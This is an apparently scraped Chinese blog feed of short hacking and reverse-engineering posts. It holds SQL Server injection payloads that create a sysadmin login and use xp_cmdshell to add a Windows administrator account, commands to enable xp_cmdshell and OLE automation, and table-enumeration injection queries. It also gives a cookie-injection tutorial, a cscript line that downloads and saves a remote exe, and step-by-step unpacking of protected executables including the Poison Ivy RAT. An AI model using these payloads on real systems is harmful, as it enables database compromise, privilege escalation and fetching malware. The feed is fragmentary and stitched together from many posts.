zh-cn 2010-08-01T15:21:13Z hourly 1 2000-01-01T12:00+00:00 http://hashchecker.de/

http://hashkiller.com/password/

md5

IP查询
http://www.yougetsignal.com/tools/web-sites-on-web-server/

]]> 2010-07-13T10:36:10Z
不能复制 不能右键

]]> 2010-03-08T10:55:55Z select host_name();
得到服务端主机名:
select @@servername;
结果一样就极有可能未分离，结果不一样就是分离的

/*

;exec master..sp_addlogin sql,sqlwoaini--
;exec master..sp_addsrvrolemember sql,sysadmin--

;EXEC MASTER..XP_CMDSHELL 'net user sql sqlwoaini /add'--
;EXEC MASTER..XP_CMDSHELL 'net localgroup administrators sql /add'--
*/


[N] = 第N個表
ID=1 and (select top 1 name from(select top [N] id,name from sysobjects where xtype=char(85)) T order by id desc)>1

[T] = 表名
[N] = 第N個字段
ID=1 and (select Top 1 col_name(object_id('[T]'),[N]) from sysobjects)>1

]]> 2010-03-04T15:56:44Z 得到客户端主机名:
select host_name();
得到服务端主机名:
select @@servername;
结果一样就极有可能未分离，结果不一样就是分离的


]]> 2010-01-22T15:55:24Z SQL2005开启选项的一些方法整理:
 sql server 2005下开启xp_cmdshell的办法
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
关闭一样.只是将上面的后面的那个"1"改成"0"就可以了:
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
 sql2005下，xp_cmdshell、sp_oA的开启方法我查到资料了，我都已经开启了，浏览器返回正常，执行命令不会再出现权限错误，但是执行"sp_oA"时会出现超时提示，执行"xp_cmdshell"时，本地监听无反应，这些我在提问贴里已经说明了，不知道是不是防火墙阻止了ping、tftp 和telnet的对外连接,我实在是找不到好的得到这个SQL2005的IP的办法了.
 SQL2005开启'OPENROWSET'支持的方法：
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
;exec sp_configure "show advanced options", 1;RECONFIGURE;exec sp_configure "Ad Hoc Distributed Queries",1;RECONFIGURE;--
 SQL2005开启'sp_oacreate'支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;


]]> 2010-01-22T15:32:11Z Alexey Solodovnikov 可能是最早的asprotect的壳了吧 我今天下载后自己加了壳试了试 的确挺简单的. 用最后一次异常法来到最后一次异常处后,再用代码段内存访问断点就到OEP了. 这时,IAT是加密的. dd 405000内存写入断点可来到这里 ...]]>
可能是最早的asprotect的壳了吧
我今天下载后自己加了壳试了试
的确挺简单的.

用最后一次异常法来到最后一次异常处后,再用代码段内存访问断点就到OEP了.

这时,IAT是加密的.
dd 405000内存写入断点可来到这里
/*92F4D0*/ CALL 0092F0EC
/*92F4D5*/ CALL 0092F358
/*92F4DA*/ MOV EDX,DWORD PTR DS:[EDI]
/*92F4DC*/ MOV DWORD PTR DS:[EDX],EAX //这里eax是错误的IAT

但是过了/*92F4D0*/ CALL 0092F0EC后eax是正确的IAT
那么nop掉/*92F4D5*/ CALL 0092F358这句应该是可以的.

不过还是有校验.
nop完顺便 hr 92F4D5再f9后 发现IAT已经填充完了.
这时候还等什么 马上dumpfix吧
完了后发现还有一个指针是错的,剪切掉后能正常运行,呵呵到这就over了.



]]> 2009-05-03T17:49:04Z 感觉也就那样 没什么可值得研究的
基本上一些不太复杂的加密壳也都能脱了
复杂的 我也没精力弄了 毕竟好多都有脚本或者脱壳机

以后碰到再说吧
主业还是安全这块 多分析分析漏洞也许是有用的

]]> 2009-04-27T16:12:29Z WebtoolMaster 两分钟解决了这个 感觉比上面那个简单多了. OEP 内存访问断 代码段---PE头---代码段 就到了 /*4070D1*/ PUSH EBP /*4070D2*/ MOV EBP,ESP /*4070D4*/ PUSH -1 /*4070D6*/ PUSH 0014.0040C0E8 /*4070DB*/ PUSH 0014...]]> 两分钟解决了这个
感觉比上面那个简单多了.

OEP
内存访问断
代码段---PE头---代码段
就到了
/*4070D1*/ PUSH EBP
/*4070D2*/ MOV EBP,ESP
/*4070D4*/ PUSH -1
/*4070D6*/ PUSH 0014.0040C0E8
/*4070DB*/ PUSH 0014.0040855C
/*4070E0*/ MOV EAX,DWORD PTR FS:[0]
/*4070E6*/ PUSH EAX
he 4070d1
这时候dumpfix不行 因为有部分iat加密了

0040C0B8 7D6111E8 shell32.ShellExecuteA
0040C0BC 00000000
0040C0C0 001434C0
0040C0C4 001434C5
0040C0C8 001434CA
0040C0CC 001434CF
0040C0D0 001434D4
0040C0D4 001434D9
0040C0D8 001434DE
0040C0DC 001434E3
0040C0E0 001434E8


在0040C0C0下内存访问断

可知道有两个地方会覆盖
004176AB /76 0E JBE SHORT 0014.004176BB
004176AD |EB 2A JMP SHORT 0014.004176D9
004176AF |EB 0A JMP SHORT 0014.004176BB
004176B1 |81FB 00000080 CMP EBX,80000000
004176B7 |73 02 JNB SHORT 0014.004176BB
把004176AB 和004176B7处的jnb nop掉就行了.


不过还有校验的地方
hr 004176AB 可来到这里
/*4173CE*/ MUL EDX
/*4173D0*/ ADD EBX,EAX
/*4173D2*/ INC EDX
/*4173D3*/ INC EDI
/*4173D4*/ LOOPD SHORT 0014.004173CC
/*4173D6*/ XCHG EAX,EBX

这里有个跳转
00417739 8B9D F82F4000 MOV EBX,DWORD PTR SS:[EBP+402FF8]
0041773F 33C3 XOR EAX,EBX
00417741 74 08 JE SHORT 0014.0041774B

je没实现就改为jmp吧
现在再到OEP后直接用OD插件脱壳都是OK的.

]]> 2009-04-22T16:59:33Z 最关键是 linker选项里面勾上ignore default libraries

]]> 2009-04-17T14:07:25Z
国产的 好象名字是 仙剑1.003
用PEID查 有个区段是XJ

OEP好找。 2次内存断点即可。
我这里是40169d。he 40169d
DUMP后修复有问题。
找了个无效指针4050ac记录下。

重新载入
dd 4050ac 下内存写入断点。
发现在/*40E955*/ MOV DWORD PTR DS:[EDX],ESI
给覆盖了。
往上看 发现这个地方跳转实现的话 就覆盖。
/*40E93A*/ JBE SHORT CrackM.0040E94A

NOP掉吧
再重新来过，
he 40e93a

在到达OEP后会退出，看来有校验。

hr 40e93a

这时发现校验在这里
/*40E9D6*/ JE SHORT CrackM.0040E9E0
把它jmp就过了校验。
DUMP时记得修正一下境象大小。
修复完IAT 再打开程序 就能运行了。看来这个壳还算简单。

我感觉他的加密IAT和校验有点象yoda's Protector里面的代码啊。

]]> 2009-04-12T21:55:59Z bart/xt 也算是压缩壳吧,不过比其他的稍微麻烦点. 入口点是这样的 /*400154*/ XCHG DWORD PTR DS: ,ESP /*40015A*/ POPAD /*40015B*/ XCHG EAX,ESP /*40015C*/ PUSH EBP /*40015D*/ MOVS BYTE PTR ES: ,BYTE PTR DS: /*40015E*/ MOV DH,80 /...]]>
也算是压缩壳吧,不过比其他的稍微麻烦点.

入口点是这样的

/*400154*/ XCHG DWORD PTR DS:[505AE0],ESP
/*40015A*/ POPAD
/*40015B*/ XCHG EAX,ESP
/*40015C*/ PUSH EBP
/*40015D*/ MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
/*40015E*/ MOV DH,80
/*400160*/ CALL DWORD PTR DS:[EBX]
/*400162*/ JNB SHORT KeyGen.0040015D
/*400164*/ XOR ECX,ECX
/*400166*/ CALL DWORD PTR DS:[EBX]
/*400168*/ JNB SHORT KeyGen.00400180
/*40016A*/ XOR EAX,EAX
/*40016C*/ CALL DWORD PTR DS:[EBX]
/*40016E*/ JNB SHORT KeyGen.0040018F
/*400170*/ MOV DH,80
/*400172*/ INC ECX
/*400173*/ MOV AL,10
/*400175*/ CALL DWORD PTR DS:[EBX]
/*400177*/ ADC AL,AL
/*400179*/ JNB SHORT KeyGen.00400175
/*40017B*/ JNZ SHORT KeyGen.004001B7
/*40017D*/ STOS BYTE PTR ES:[EDI]
/*40017E*/ JMP SHORT KeyGen.00400160
/*400180*/ CALL DWORD PTR DS:[EBX+8]
/*400183*/ ADD DH,DH
/*400185*/ SBB ECX,1
/*400188*/ JNZ SHORT KeyGen.00400198
/*40018A*/ CALL DWORD PTR DS:[EBX+4]
/*40018D*/ JMP SHORT KeyGen.004001B3
/*40018F*/ LODS BYTE PTR DS:[ESI]
/*400190*/ SHR EAX,1
/*400192*/ JE SHORT KeyGen.004001C1
/*400194*/ ADC ECX,ECX
/*400196*/ JMP SHORT KeyGen.004001B0
/*400198*/ XCHG EAX,ECX
/*400199*/ DEC EAX
/*40019A*/ SHL EAX,8
/*40019D*/ LODS BYTE PTR DS:[ESI]
/*40019E*/ CALL DWORD PTR DS:[EBX+4]
/*4001A1*/ CMP EAX,DWORD PTR DS:[EBX-8]
/*4001A4*/ JNB SHORT KeyGen.004001B0
/*4001A6*/ CMP AH,5
/*4001A9*/ JNB SHORT KeyGen.004001B1
/*4001AB*/ CMP EAX,7F
/*4001AE*/ JA SHORT KeyGen.004001B2
/*4001B0*/ INC ECX
/*4001B1*/ INC ECX
/*4001B2*/ XCHG EAX,EBP
/*4001B3*/ MOV EAX,EBP
/*4001B5*/ MOV DH,0
/*4001B7*/ PUSH ESI
/*4001B8*/ MOV ESI,EDI
/*4001BA*/ SUB ESI,EAX
/*4001BC*/ REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
/*4001BE*/ POP ESI
/*4001BF*/ JMP SHORT KeyGen.00400160
/*4001C1*/ POP ESI
/*4001C2*/ LODS DWORD PTR DS:[ESI]
/*4001C3*/ XCHG EAX,EDI
/*4001C4*/ LODS DWORD PTR DS:[ESI]
/*4001C5*/ PUSH EAX
/*4001C6*/ CALL DWORD PTR DS:[EBX+10]
/*4001C9*/ XCHG EAX,EBP
/*4001CA*/ MOV EAX,DWORD PTR DS:[EDI]
/*4001CC*/ INC EAX
/*4001CD*/ JS SHORT KeyGen.004001C2
/*4001CF*/ JNZ SHORT KeyGen.004001D4
/*4001D1*/ JMP DWORD PTR DS:[EBX+C]
/*4001D4*/ PUSH EAX
/*4001D5*/ PUSH EBP
/*4001D6*/ CALL DWORD PTR DS:[EBX+14]
/*4001D9*/ STOS DWORD PTR ES:[EDI]
/*4001DA*/ JMP SHORT KeyGen.004001CA
/*4001DC*/ XOR ECX,ECX
/*4001DE*/ INC ECX
/*4001DF*/ CALL DWORD PTR DS:[EBX]
/*4001E1*/ ADC ECX,ECX
/*4001E3*/ CALL DWORD PTR DS:[EBX]
/*4001E5*/ JB SHORT KeyGen.004001DF
/*4001E7*/ RET
/*4001E8*/ ADD DL,DL
/*4001EA*/ JNZ SHORT KeyGen.004001F1
/*4001EC*/ MOV DL,BYTE PTR DS:[ESI]
/*4001EE*/ INC ESI
/*4001EF*/ ADC DL,DL
/*4001F1*/ RET

这个用esp定律好象不行.
不过比较短,可以单步慢慢跟.
跟过两遍后发现直接f4到这
/*4001D1*/ JMP DWORD PTR DS:[EBX+C]
再单步一下就到oep了.
这时看下iat

0040C09C 7C80CD27 kernel32.SetHandleCount
0040C0A0 7C812FC9 kernel32.GetStdHandle
0040C0A4 7C810EE1 kernel32.GetFileType
0040C0A8 7C94ABA5 ntdll.RtlUnwind
0040C0AC 7C810E17 kernel32.WriteFile
0040C0B0 7C80AE30 kernel32.GetProcAddress
0040C0B4 7C812A99 kernel32.RaiseException
0040C0B8 7C812F06 kernel32.GetCPInfo
0040C0BC 7C8099A5 kernel32.GetACP
0040C0C0 7FFFFFFF
0040C0C4 77D24A4E user32.EndDialog
0040C0C8 77D507EA user32.MessageBoxA
0040C0CC 77D2E8F6 user32.LoadIconA
0040C0D0 77D2F3C2 user32.SendMessageA
0040C0D4 77D3B144 user32.DialogBoxParamA
0040C0D8 77D6B05E user32.GetDlgItemTextA
0040C0DC 7FFFFFFF
0040C0E0 76B15A4A winmm.waveOutWrite
0040C0E4 76B159D9 winmm.waveOutPrepareHeader
0040C0E8 76B15201 winmm.waveOutOpen
0040C0EC 76B15726 winmm.waveOutClose

每组iat中间间隔是7fffffff而不是00000000
这个好说 右键--->二进制填充为0就ok了
这时再dump和修复iat就能运行了.

]]> 2009-04-10T14:46:23Z 再设置忽略所有异常,脱这个壳也不用这么麻烦
直接hr esp f9 f9 f9 就OK了.

]]> 2009-04-10T12:38:20Z

手脱原版的Poison Ivy 2.3.2.exe
听说国外这个马功能很强大。想玩玩试试，随手用PEID查看发现加的有壳。
不过没查出来是什么壳，只看到最后一个区段名是GPPE。
不管了，给它脱了！！
--------------------------邪恶的分割线----------------------------
1.查找OEP
可以用老Y写的GUnPacker0.50来找

当然这个也可以直接用esp定律。F9两次就可以到
/*561A9C*/ PUSH EBP
/*561A9D*/ MOV EBP,ESP
/*561A9F*/ MOV ECX,4
/*561AA4*/ PUSH 0
/*561AA6*/ PUSH 0
/*561AA8*/ DEC ECX
/*561AA9*/ DB 75
/*561AAA*/ DB F9

0x00561A9C就是OEP了。

--------------------------华丽的分割线----------------------------
2.去校验。
找到OEP后可以先he 561A9C作备用。
这时DUMP后再ImportREC修复IAT时发现有好多无效的。
可能有些IAT被加密了。
顺手找一个CALL
/*561D11*/ CALL Poison_I.0040720C
enter敲进去看下
/*40720C*/ JMP DWORD PTR DS:[5684CC]
然后在命令窗口dd 5684CC

00568310 7C812FC9 kernel32.GetStdHandle
00568314 7C810B07 kernel32.GetFileSize
00568318 7C810EE1 kernel32.GetFileType
0056831C 7C801A28 kernel32.createFileA
00568320 7C809BD7 kernel32.CloseHandle
00568324 00000000
00568328 001534E0 ;加密了
0056832C 001534E5
00568330 001534EA
00568334 001534EF
00568338 00000000
0056833C 001534F4
00568340 001534F9
00568344 001534FE

发现确实有一些IAT被加密了

重新来过吧
在 00568328下内存写入断点。

当发现 变为00568328 77D311DB user32.GetKeyboardType时

注意看数据窗口
ESI=001534E0
DS:[00568328]=77D311DB (user32.GetKeyboardType)
然后F8走一下看看
发现
/*61161D*/ CMP EBX,77FFFFFF
/*611623*/ JBE SHORT Poison_I.00611633
在611623处跳转实现了就会加密。所以这里干脆把它NOP掉。

但是NOP掉后再F9执行，程序直接退出了，看来还是有校验啊。


那我在hr 611623再F9 看看到底那里校验我的。

来到这了
/*611319*/ MOV AL,BYTE PTR DS:[EDI]
/*61131B*/ MUL EDX
/*61131D*/ ADD EBX,EAX
/*61131F*/ INC EDX
/*611320*/ INC EDI
/*611321*/ LOOPD SHORT Poison_I.00611319
/*611323*/ XCHG EAX,EBX

MOV AL,BYTE PTR DS:[EDI]就是取那里的代码然后放到了eax里。
把这个循环走出来再看下，
/*611695*/ JMP SHORT Poison_I.00611698
/*611697*/ ???
/*611698*/ MOV EBX,DWORD PTR SS:[EBP+40425E]
/*61169E*/ XOR EAX,EBX ;这里是比较是否相等的，关键。
/*6116A0*/ JE SHORT Poison_I.006116AA

比完以后没跳转，那我把它改成jmp 006116AA应该就OK了。
把其他断点全删除，只留到OEP那个，再F9后就飞向光明之颠。

避开了IAT加密，这次再DUMP，修复IAT就没问题了。不过在DUMP时要先修正下镜象大小。注意OEP=561A9C-40000=161a9c。



]]> 2009-04-10T12:12:57Z
]]> 2009-03-20T15:07:06Z = Factor) result += Number /= Factor; return result; } int GetLastDigit...]]>

int GetFactorNumber(unsigned Number, unsigned Factor)
{
int result = 0;
if(Factor < 2 || Number < 1)
return -1;
while(Number >= Factor)
result += Number /= Factor;
return result;
}

int GetLastDigit(unsigned Number)
{
int result = 1;/*这是连乘法的基础值，也是最后要返回的结果*/
int i;/*循环变量*/
int tmp;/*循环中用到的临时值*/
int Count = 0;/*记录找到的因子2的个数，直到和因子5的个数相等*/
int TotalFactors = GetFactorNumber(Number, 5);/*因子5的总数*/
for(i = Number; i >= 1; i--)/*从Number一直向下处理*/
{
tmp = i;
/*尽可能多的得到因子2，直到tmp是个奇数或者不需要更多的因子2*/
while(tmp % 2 == 0 && Count < TotalFactors)
{
tmp /= 2;
Count++;
}
while(tmp % 5 == 0)/*除去所有的因子5*/
tmp /= 5;
tmp %= 10;/*取得个位数*/
result *= tmp;/*做阶乘*/
result %= 10;/*只保留个位数*/
}
return result;/*返回运算结果*/
}

int main(int argc, char* argv[])
{

unsigned k=GetLastDigit(2008);

  printf("%d\n",k);
  return 0;
}


]]> 2009-02-25T11:47:44Z
可以先把流程的跳转都给改正确了 然后保存之

载入OD

然后随便在一处暴的地方 hr 下硬件访问断点

F9运行,会跑到校验的地方.然后再改跳转即可.

]]> 2009-02-24T20:24:56Z
]]> 2009-02-18T16:51:52Z 就禁止数据的提交! 但他没有检测Cookies的数据！问题就来了~~~
那我们怎样测试是否有Cookies注入问题~

请先看下面的的连接(示例用,所以连接不是真的)

http://www.xxx.com/1.asp?id=123

如果我们只输 http://www.xxx.com/1.asp

时，就不能看到正常的数据，因为没有参数!
我们想知道有没有Cookies问题(也就是有没有Request("XXX")格式问题),
先用IE输入
http://www.xxx.com/1.asp
加载网页,显示不正常（没有输参数的原因)
之后在IE输入框再输入
javascript:alert(document.cookie="id="+escape("123"));
按回车,你会看到弹出一个对话框 内容是: id=123
之后，你刷新一个网页，如果正常显示，表示是用
Request("ID") 这样的格式收集数据~~~~,这种格式就可以试Cookies注入了

在输入框中输入
javascript:alert(document.cookie="id="+escape("123 and 3=3"));
刷新页面,如果显示正常,可以再试下一步(如果不正常,就有可能也有过滤了)

javascript:alert(document.cookie="id="+escape("123 and 3=4"));刷新一下页面
如果不正常显示，这就表示有注入了~~~

如果程序员是用
Request.QueryString
或
Request.Form
收集数据的话，是无法利用Cookies绕过防注入系统进行注入的，因为服务程序是直截从GET或POST中读取数据的，Cookies是否有数据,WEB服务器是不理的,所以就无法利用了！~

--------------------------------------------------------------------------




]]> 2009-02-10T17:09:04Z
cscript c:\iget.vbs htp://www.baidu.com/k.exe c:\k.exe

]]> 2008-12-23T11:44:08Z 查找->所有分支，然后在任意一分支上点右键->列出switch的case 这个倒是个有用的功能:) ]]> OD载入exe，右键->查找->所有分支，然后在任意一分支上点右键->列出switch的case
这个倒是个有用的功能:)


]]> 2008-11-28T13:37:49Z